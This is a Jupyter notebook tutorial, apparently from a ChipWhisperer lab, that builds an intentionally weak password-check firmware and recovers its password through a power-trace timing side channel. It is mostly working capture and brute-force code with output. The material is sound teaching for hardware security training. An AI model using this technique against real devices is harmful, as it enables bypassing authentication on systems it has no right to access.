# Timing Analysis with Power for Password Bypass

Supported setups:

SCOPES:

* OPENADC
* CWNANO

PLATFORMS:

* CWLITEARM
* CWLITEXMEGA
* CWNANO

This tutorial will introduce you to breaking devices by determining when a device is performing certain operations. It will use a simple password check, and demonstrate how to perform a basic power analysis.

Note this is not a prerequisite to the tutorial on breaking AES. You can skip this tutorial if you wish to go ahead with the AES tutorial.

In [1]:
SCOPETYPE = 'OPENADC'
PLATFORM = 'CWLITEXMEGA'
CRYPTO_TARGET = 'NONE'

## Firmware

Like before, we'll need to setup our `PLATFORM`, then build the firmware:

In [2]:
%%bash -s "$PLATFORM" "$CRYPTO_TARGET"
cd ../hardware/victims/firmware/basic-passwdcheck
make PLATFORM=$1 CRYPTO_TARGET=$2

rm -f -- basic-passwdcheck-CWLITEXMEGA.hex
rm -f -- basic-passwdcheck-CWLITEXMEGA.eep
rm -f -- basic-passwdcheck-CWLITEXMEGA.cof
rm -f -- basic-passwdcheck-CWLITEXMEGA.elf
rm -f -- basic-passwdcheck-CWLITEXMEGA.map
rm -f -- basic-passwdcheck-CWLITEXMEGA.sym
rm -f -- basic-passwdcheck-CWLITEXMEGA.lss
rm -f -- objdir/*.o
rm -f -- objdir/*.lst
rm -f -- basic-passwdcheck.s simpleserial.s XMEGA_AES_driver.s uart.s usart_driver.s xmega_hal.s
rm -f -- basic-passwdcheck.d simpleserial.d XMEGA_AES_driver.d uart.d usart_driver.d xmega_hal.d
rm -f -- basic-passwdcheck.i simpleserial.i XMEGA_AES_driver.i uart.i usart_driver.i xmega_hal.i
mkdir objdir 
mkdir .dep
.
-------- begin --------
avr-gcc (GCC) 5.4.0
Copyright (C) 2015 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

.
Compiling C: basic-passwdcheck.c
avr-gcc -c -mmcu=atxmega128d3 -I. -fpack-struct -gdwarf-2 

.././simpleserial/simpleserial.c: In function ‘simpleserial_get’:
.././simpleserial/simpleserial.c:131:10: warning: variable ‘ret’ set but not used [-Wunused-but-set-variable]
  uint8_t ret[1];
          ^


## Setup

Setup is the same as usual, except this time we'll be capturing 2000 traces.

In [3]:
%run "Helper_Scripts/Setup_Generic.ipynb"

In [4]:
fw_path = '../hardware/victims/firmware/basic-passwdcheck/basic-passwdcheck-{}.hex'.format(PLATFORM)
#scope.clock.adc_src = "clkgen_x1"
#scope.clock.adc_src = 'extclk_x4'

In [5]:
cw.program_target(scope, prog, fw_path)

XMEGA Programming flash...
XMEGA Reading flash...
Verified flash OK, 2657 bytes


## Communicating With The Target

As was mentioned at the beginning of the tutorial, the firmware we loaded onto the target implements a basic password check. After getting a `'\n'` terminated password, the target checks it and enters an infinite loop, so before communicating with it, we'll need to reset it.

We'll be doing this a lot, so we'll define a function that resets the target (this function is also available by running "Helper_Scripts/Setup.ipynb" as we did above):

In [6]:
import time
def reset_target(scope):
    if PLATFORM == "CW303" or PLATFORM == "CWLITEXMEGA":
        scope.io.pdic = 'low'
        time.sleep(0.05)
        scope.io.pdic = 'high'
        time.sleep(0.05)
    else:  
        scope.io.nrst = 'low'
        time.sleep(0.05)
        scope.io.nrst = 'high'
        time.sleep(0.05)

The target sends some text to us upon starting. After running the block below, you should see some text appear. 

**NOTE**
The text may appear cutoff, accompanied by a message about data loss. This means that the buffer used to store serial data (128 bytes) from the target is full. This isn't an issue here, since the text is just aesthetic, but keep this in mind if you want to do large transfers of serial data using ChipWhisperer. 

In [7]:
ret = ""
reset_target(scope)

num_char = target.in_waiting()
while num_char > 0:
    ret += target.read(timeout=10)
    time.sleep(0.05)
    num_char = target.in_waiting()
    
print(ret)

 *****Safe-o-matic 3000 Booting...
Aligning bits........[DONE]
Checking Cesium RNG..[DONE]
Masquerading flash...[DONE]
Decrypti flash...[DONE]
Decrypting database..[DONE]


Please enter password to continue: 


Now we can send the target a password:

In [8]:
target.flush()
target.write("h0px3\n")

And get the response. We sent it the right password (hopx3), so you should see "Access granted, Welcome!":

In [9]:
print(target.read(timeout=100))

Access granted, Welcome!



**tip**

In real systems, you may often know one of the passwords, which is sufficient to investigate the password checking routines as we will do. You also normally have an ability to reset passwords to default. While the reset procedure would erase any data you care about, the attacker will be able to use this 'sacrificial' device to learn about possible vulnerabilities. So the assumption that we have access to the password is really just saying we have access to a password, and will use that knowledge to break the system in general.

## Recording Traces

Now that we can communicate with our super-secure system, our next goal is to get a power trace while the target is running. To do this, we'll arm the scope just before we send our password attempt, then record the trace as we've done before.

In [10]:
if PLATFORM == "CWNANO":
    scope.adc.samples = 800
else:
    scope.adc.samples = 2000

In [11]:
ret = ""
password_good = "h0px3"
reset_target(scope)
num_char = target.in_waiting()
while num_char > 0:
    ret += target.read(timeout=10)
    time.sleep(0.01)
    num_char = target.in_waiting()
    
print('First read out of target\nSTART>>{}<<END'.format(ret))
scope.arm()
target.flush()
target.write(password_good+"\n")
ret = scope.capture()
if ret:
    print('Timeout happened during acquisition')
        
trace = scope.get_last_trace()
resp = ""
num_char = target.in_waiting()
while num_char > 0:
    resp += target.read(timeout=10)
    time.sleep(0.01)
    num_char = target.in_waiting()

print('Second read out of target\nSTART>>{}<<END'.format(resp))

First read out of target
START>>I! !      *****Safe-o-matic 3000 Booting...
Aligning bits........[DONE]
Checking Cesium RNG..[DONE]
Masquerading flash...[DONE]
Decrypting database..[DONE]


Please enter password to continue: <<END
Second read out of target
START>>Access granted, Welcome!
<<END


Now that we have a trace, we'll use bokeh to plot it:

In [12]:
from bokeh.plotting import figure, show 
from bokeh.io import output_notebook
from bokeh.models import CrosshairTool

output_notebook()
p = figure()
x_range = range(0, len(trace))
p.line(x_range, trace)
show(p)

Loading BokehJS ...

## Timing Analysis

Now that we can capture traces, we can begin planning our attack. First we'll make a function to guess a password and return a power trace, since we'll be repeating those steps a lot:

In [13]:
def cap_pass_trace(pass_guess):
    ret = ""
    reset_target(scope)
    num_char = target.in_waiting()
    while num_char > 0:
        ret += target.read(num_char, 10)
        time.sleep(0.01)
        num_char = target.in_waiting()

    scope.arm()
    target.write(pass_guess)
    ret = scope.capture()
    if ret:
        print('Timeout happened during acquisition')

    trace = scope.get_last_trace()
    return trace

Next, we'll try two different passwords and see if the power traces differ by length. We'll then plot both traces on the same figure (with the first in red and the second in blue).

In [14]:
trace = cap_pass_trace("\n")
new_trace = cap_pass_trace("h\n")
x_range = range(0, len(new_trace))
p = figure()
p.add_tools(CrosshairTool())
p.line(x_range, new_trace)
p.line(x_range, trace, line_color='red')
show(p)

Another test to demonstrate a 5 char bad password with a good password.

In [15]:
trace = cap_pass_trace("aaaaa\n")
new_trace = cap_pass_trace(password_good+"\n")
x_range = range(0, len(new_trace))
p = figure()
p1 = figure()
p2 = figure()
p.add_tools(CrosshairTool())
p.line(x_range, new_trace, line_color='blue',name='Good password')
p.line(x_range, trace, line_color='red')
show(p)

#Split
p1.add_tools(CrosshairTool())
p2.add_tools(CrosshairTool())
p1.line(x_range, new_trace, line_color='blue',name='Good password')
p2.line(x_range, trace, line_color='red', name='Bad password')
show(p1)
show(p2)


Create a function to make drawing graphs easier, plus better gui options to obtain values.

In [16]:
def graph_trace(trace, max_range=len(trace), markers={}):
    x_range = range(0, max_range)
    TOOLTIPS = [
        ("index", "$index"),
        ("(Trace,Power)", "(@x{00}, @y{0.00})"),
    ]
    plot = figure(tooltips=TOOLTIPS,width=900,height=300)
    plot.add_tools(CrosshairTool())
    plot.line(x_range, trace[:max_range], line_color='black')
    
    if markers.get('markers_x') and markers.get('markers_y'):
        x = markers.get('markers_x')
        y = markers.get('markers_y')

        # Add markers to graph to draw attention
        plot.circle(x=x, y=y, size=7,color='blue',alpha=0.4)

    show(plot)

You should see both traces start and end similarly, but differ elsewhere. If you look closely, you should see that the blue trace looks a lot like the red trace but shifted later in time. We'll use this timing difference to break the password!

Edit the above block to try different passwords and see how it changes for different lengths and number of correct characters. 

Go back to the original guesses (`"\n"` and `"h\n"`) and find some distinct spikes that get shifted in time. Your target may differ, but in my case, there were some distinct spikes of about -0.21 at 217 in red and 253 in blue. The plot is interactive, so you can zoom in and move around using the buttons on the right side of the plot. Record their locations, value, and the difference in location (in my case, 217, 253, -0.21, and 36).

## Attacking a Single Letter

Now that we've located a distinctive timing difference, we can start building our attack. We'll start with a single letter, since that will quickly give us some feedback on the attack.

The plan for the attack is simple: keep guessing letters until we no longer see the distinctive spike in the original location. To do this, we'll create a loop that:

* Figures out our next guess
* Does the capture and records the trace
* Checks if sample 217 is larger than -0.2 (replace with appropriate values)

To make things a little easier for later, we'll make a function that will return whether our spike is (guess incorrect) or isn't (guess correct) in the right location:

In [17]:
def checkpass(trace, i):
    if PLATFORM == "CWNANO":
        #There's a bit of jitter
        return (trace[228 + 11*i] < 3 and trace[227 + 11*i] < 0.3)
    elif PLATFORM == "CWLITEARM" or PLATFORM == "CW308_STM32F3":
        return trace[229 + 36*i] > -0.2
    elif PLATFORM == "CW303" or PLATFORM == "CWLITEXMEGA":
        return trace[121 + 72 * i] > -0.3


Let's modify the checkpass function to make it easier to adjust for deviations

In [18]:
def checkpass(trace, i, power=-0.3,start_trace=121,trace_step=72,jitter=0):
    if PLATFORM == "CWNANO":
        #There's a bit of jitter
        return (trace[228 + 11*i] < 3 and trace[227 + 11*i] < 0.3)
    elif PLATFORM == "CWLITEARM" or PLATFORM == "CW308_STM32F3":
        return trace[229 + 36*i] > -0.2
    elif PLATFORM == "CW303" or PLATFORM == "CWLITEXMEGA":
        return trace[start_trace + (trace_step * i) + jitter] > power

The below loop finds the first correct character, prints it, then ends. You should see "Success: h" after a while.  
Expect this code to fail in finding the correct character for the password.  
Take the time to analyze the trace readout and find the point in time of the trace that indicates when a char is wrong.  

Tip: Compare the bad guess trace with the correct password trace. Start by comparing each trace point from left to right and take note of the different points.  
Personally I found it easier to read the traces after zooming into the trace to make it easier to visually compare points. 
This [trace](https://wiki.newae.com/File:Passwordcrackerpts.png) from an older NewAE [tutorial](https://wiki.newae.com/V3:Tutorial_B3-1_Timing_Analysis_with_Power_for_Password_Bypass) demonstrates the goal best.

In [19]:
trylist = "abcdefghijklmnopqrstuvwxyz0123456789"
password = ""
power_threshold = -0.20 # Important
trace_step = 40 # This value isn't important when guessing only the first char
trace_index = 145 # Really import. You might have to compare two trace points to account for jitter.

# Attempt bruteforce first char of password
for c in trylist:
    next_pass = password + c + "\n"
    trace = cap_pass_trace(next_pass)
    
    if (
        checkpass(trace, 0,power_threshold,trace_index,trace_step) 
        and 
        checkpass(trace, 0,power_threshold,trace_index+1,trace_step)
    ):
        # todo: check to account for jitter.
        print("Success: " + c)
        graph_trace(trace,307)
        trace = cap_pass_trace("h0px3\n")
        graph_trace(trace,307)
        break
        
reset_target(scope)

Success: h


Slight modification to the code above to make it possible to test any char in the password index.  
Added markers to graph to indicate points of interest.

In [20]:
trylist = "abcdefghijklmnopqrstuvwxyz0123456789"
password = ""
power_threshold = -0.20 # Important
trace_step = 40 # This value is important when guessing any char other than the first char
trace_index = 145 # Really import. You might have to compare two trace points to account for jitter.

print(password_good)
password_index = 1 # Change this value manually to experiement

# Attempt bruteforce first char of password
for c in trylist:
    next_pass = password_good[0:password_index] + c + "\n"
    trace = cap_pass_trace(next_pass)
    final_trace_index = trace_index+(trace_step*password_index)
    
    if (
        checkpass(trace, password_index,power_threshold,trace_index,trace_step,0)
        and 
        checkpass(trace, password_index,power_threshold,trace_index,trace_step,1)
    ):
        print("Success: " + c)
        graph_trace(trace,307,
                    {'markers_x':[final_trace_index,final_trace_index+1],
                     'markers_y':[power_threshold,power_threshold]}
        )
        trace = cap_pass_trace(password_good[0:password_index+1]+"\n")
        graph_trace(trace,307)
        break
        
reset_target(scope)

h0px3
Success: 0


In [21]:
def __bruteforce_index(crack_index=0):
    '''Attempt to bruteforce a char a crack_index of the password.
    Any char greater than index 0, will only work if previous chars are known.
    
    Arg:
        crack_index: int, which index in the password to bruteforce guess
    
    '''
    trylist = "abcdefghijklmnopqrstuvwxyz0123456789"
    password = ""
    power_threshold = -0.20 # Important
    trace_step = 41 # This value is important when guessing any char other than the first char
    trace_index = 145 # Really import. You might have to compare two trace points to account for jitter.
    
    #print(password_good)
    password_good = password_good # We already know the password.
    password_index = crack_index #
    found_char = ''

    # Attempt bruteforce char of password specifiec by crack_index
    for c in trylist:
        next_pass = password_good[0:password_index] + c + "\n"
        trace = cap_pass_trace(next_pass)
        
        '''There is a deviation in time when the power spike indicating a failed password
        appears.
        We must check multiple points in the trace to ensure we have the correct reading.
        '''
        if (
            checkpass(trace, password_index,power_threshold,trace_index,trace_step) 
            and 
            checkpass(trace, password_index,power_threshold,trace_index+1,trace_step)
            and
            checkpass(trace, password_index,power_threshold,trace_index,trace_step+1) 
            and 
            checkpass(trace, password_index,power_threshold,trace_index+1,trace_step+1)
           ):
            print("Success: {} in {}".format(c,next_pass) )
            #graph_trace(trace,300)
            trace = cap_pass_trace(password_good[0:password_index+1]+"\n")
            #graph_trace(trace,300)
            found_char = c
            break

    #reset_target(scope)
    return found_char

In [24]:
def bruteforce_index(password_so_far='', debug=False):
    '''Attempt to bruteforce a char a crack_index of the password.
    Any char greater than index 0, will only work if previous chars are known.
    If unable to crack char, retry attempt is possible.
    
    Arg:
        crack_index: int, which index in the password to bruteforce guess
    
    '''
    __debug = debug
    
    trylist = "abcdefghijklmnopqrstuvwxyz0123456789"
    password = ""
    power_threshold = -0.20 # Important
    power_threshold = -0.20 # Important
    trace_step = 40 # This value is important when guessing any char other than the first char
    trace_index = 145 # Really import. You might have to compare two trace points to account for jitter.
    jitter = 1 # deviation
    password_so_far = password_so_far # We already know the password.
    password_index = len(password_so_far) #
    found_char = ''
    retry = 2
    
    if __debug:
        print('Debug bruteforce_index()')
        print('Power threshold {}, trace step {}, trace index {}, password so far {}, index to crack {}.'.
              format(
             power_threshold,
             trace_step,
             trace_index,
             password_so_far,
             password_index))

    for attempt in range(0,retry+1):
        # Attempt bruteforce char of password specifiec by crack_index
        for c in trylist:
            next_pass = password_so_far[0:password_index] + c + "\n"
            trace = cap_pass_trace(next_pass)
            final_trace_index = trace_index+(trace_step*password_index)

            if __debug:
                print('Password sent: {}'.format(next_pass))
                print('Trace value readouts: Trace[{}]={}, jitter Trace[{}]={}'.format(
                        final_trace_index,
                        trace[final_trace_index:final_trace_index+1],
                        final_trace_index+jitter,
                        trace[final_trace_index+jitter:final_trace_index+jitter+1])
                )


            '''There is a deviation in time when the power spike indicating a failed password
            appears.
            We must check multiple points in the trace to ensure we have the correct reading.
            '''
            if (
                checkpass(trace, password_index,power_threshold,trace_index,trace_step,0)
                and 
                checkpass(trace, password_index,power_threshold,trace_index,trace_step,jitter)
                ):
                print("Success: {} in {}".format(c,next_pass) )

                if __debug:
                    print('Trace value readouts: Trace[{}]={}'.format(
                        final_trace_index,
                        trace[final_trace_index:final_trace_index+1])
                    )
                    graph_trace(trace,345)
                    trace = cap_pass_trace(password_good[0:password_index+1]+"\n")
                    graph_trace(trace,345)
                found_char = c
                break
    
    
        # Notify user we haven't found the char and ran out of retries.
        if found_char == '':
            print('Char not cracked. Attempt {} Retry? {}'.format(attempt+1, retry))
            if retry <= attempt: # Unable to guess correctly
                raise Exception('Unable to crack password')
        else: # char is cracked
            break

    #reset_target(scope)
    return found_char

Just some test proof of concept code to experiement with automating some way of determining where in the trace to look for password check.
Stopped working on it so don't use yet.

In [23]:
trylist = "abcdefghijklmnopqrstuvwxyz0123456789"
password = "h"
import numpy

def bruteforce_power():
    success_power = set()
    # Attempt bruteforce first char of password
    for power in numpy.arange(-0.25,0,0.01):
    #for power in numpy.arange(0.0,0.3,0.001):
        next_pass = password + "\n"
        trace = cap_pass_trace(next_pass)
        # print(power)

        if checkpass(trace, 0, power):
            #print("Success: {} {}".format(password, power))
            success_power.add(power)
            #break
    return success_power


pm = []
for round in range(0,3):    
    pm += list(bruteforce_power())

count_p = {}
for p in set(pm):
    count_p[p] = pm.count(p)

freq_power = max(count_p, key=lambda key: count_p[key])
print('{} {}'.format(freq_power, count_p[freq_power]))
reset_target(scope)

-0.25 3


## Attacking the Full Password

Now that we can guess a single character, attacking the rest is easy; we just need to repeat the process in another loop, move the check point (this is the change is location you recorded earlier), and update our guess with the new correct letter.

After updating the below script and running it, you should see parts of the password printed out as each letter is found.

In [26]:
# Should change strategy to determine condition for success or failure and allow for variable length passwords
cracked_password = ''

cracked_password = bruteforce_index('h0px',debug=False)
print(cracked_password)

Char not cracked. Attempt 1 Retry? 2
Char not cracked. Attempt 2 Retry? 2
Success: 3 in h0px3

3


In [31]:
# Should change strategy to determine condition for success or failure and allow for variable length passwords
password_length = 5
cracked_password = ''

for password_index in range(0,password_length):
    print('cracking index {}'.format(password_index))
    cracked_password += bruteforce_index(cracked_password)
    print(cracked_password)
    
print('Guessed password is {}'.format(cracked_password))

cracking index 0
Success: h in h

h
cracking index 1
Char not cracked. Attempt 1 Retry? 2
Success: 0 in h0

h0
cracking index 2
Success: p in h0p

h0p
cracking index 3
Success: x in h0px

h0px
cracking index 4
Char not cracked. Attempt 1 Retry? 2
Success: 3 in h0px3

h0px3
Guessed password is h0px3


That's it! You should have successfully cracked a password using the timing attack. Some notes on this method:

* The target device has a finite start-up time, which slows down the attack. If you wish, remove some of the `printf()`'s from the target code, recompile and reprogram, and see how quickly you can do this attack.
* The current script doesn't look for the "WELCOME" message when the password is OK. That is an extension that allows it to crack any size password.
* If there was a lock-out on a wrong password, the system would ignore it, as it resets the target after every attempt.

## Conclusion

This tutorial has demonstrated the use of the power side-channel for performing timing attacks. A target with a simple password-based security system is broken.

In [32]:
scope.dis()
target.dis()

## Tests

In [33]:
assert (cracked_password == "h0px3"), "Failed to break password, got {}.\nIf on Nano, may need to rerun".format(password)